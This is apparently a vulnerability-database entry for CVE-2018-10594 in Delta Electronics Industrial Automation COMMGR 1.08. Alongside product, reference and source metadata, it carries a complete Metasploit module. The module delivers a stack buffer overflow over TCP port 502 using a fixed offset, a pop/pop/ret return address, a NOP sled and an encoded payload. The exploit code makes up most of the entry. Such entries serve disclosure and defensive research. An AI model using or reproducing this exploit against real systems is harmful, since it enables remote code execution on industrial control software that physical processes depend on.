ID
VAR-E-201807-0027
CVE
cve_id: | CVE-2018-10594 | Trust: 3.1 |
EDB ID
45574
TITLE
Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit) - Windows remote Exploit
Trust: 0.6
DESCRIPTION
Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit). CVE-2018-10594. Remote exploit for Windows platform.
Trust: 0.6
AFFECTED PRODUCTS
vendor: | delta | model: | electronics delta industrial automation commgr | scope: | eq | version: | 1.08 | Trust: 2.1 |
vendor: | delta | model: | industrial automation commgr | scope: | eq | version: | 1.08 | Trust: 0.5 |
vendor: | delta | model: | electronics delta industrial automation commgr stack | scope: | eq | version: | 1.08 | Trust: 0.5 |
EXPLOIT
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
      'Description' => %q{
        This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
        Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
        crafted packets. This module has been tested successfully on Delta Electronics Delta
        Industrial Automation COMMGR 1.08 over
        Windows XP SP3,
        Windows 7 SP1, and
        Windows 8.1.
      },
      'Author' =>
        [
          'ZDI', # Initial discovery
          't4rkd3vilz', # PoC
          'hubertwslin' # Metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2018-10594' ],
          [ 'BID', '104529' ],
          [ 'ZDI', '18-586' ],
          [ 'ZDI', '18-588' ],
          [ 'EDB', '44965' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]
        ],
      'Payload' =>
        {
          'Space' => 640,
          'DisableNops' => true,
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'COMMGR 1.08 / Windows Universal',
            {
              'Ret' => 0x00401e14, # p/p/r COMMGR.exe
              'Offset' => 4164
            }
          ],
        ],
      'DisclosureDate' => 'Jul 02 2018',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(502)
      ])
  end

  def exploit
    data = rand_text_alpha(target['Offset'])
    data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
    data << [target.ret].pack("V")
    data << make_nops(40)
    data << payload.encoded

    print_status("Trying target #{target.name}, sending #{data.length} bytes...")
    connect
    sock.put(data)
    disconnect
  end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Stack Buffer Overflow (Metasploit)
Trust: 1.6
TAGS
tag: | exploit | Trust: 1.5 |
tag: | overflow | Trust: 1.5 |
tag: | Metasploit Framework (MSF) | Trust: 1.0 |
tag: | Remote | Trust: 1.0 |
tag: | proof of concept | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2018-10594 | Trust: 3.1 |
db: | ICS CERT | id: | ICSA-18-172-01 | Trust: 1.6 |
db: | EXPLOIT-DB | id: | 45574 | Trust: 1.6 |
db: | EDBNET | id: | 99652 | Trust: 0.6 |
db: | PACKETSTORM | id: | 148381 | Trust: 0.5 |
db: | PACKETSTORM | id: | 149741 | Trust: 0.5 |
db: | PACKETSTORM | id: | 149715 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2018-10594 | Trust: 3.1 |
url: | https://raw.githubusercontent.com/rapid7/metasploit-framework/96681b03d123605f3963c519ccb3000efcfe3ed1/modules/exploits/windows/scada/delta_ia_commgr_bof.rb | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/45574/ | Trust: 0.6 |
SOURCES
db: | PACKETSTORM | id: | 148381 |
db: | PACKETSTORM | id: | 149741 |
db: | PACKETSTORM | id: | 149715 |
db: | EXPLOIT-DB | id: | 45574 |
db: | EDBNET | id: | 99652 |
LAST UPDATE DATE
2022-07-27T09:21:21.304000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 148381 | date: | 2018-07-02T16:17:06 |
db: | PACKETSTORM | id: | 149741 | date: | 2018-10-10T17:28:04 |
db: | PACKETSTORM | id: | 149715 | date: | 2018-10-08T16:17:57 |
db: | EXPLOIT-DB | id: | 45574 | date: | 2018-10-09T00:00:00 |
db: | EDBNET | id: | 99652 | date: | 2018-10-09T00:00:00 |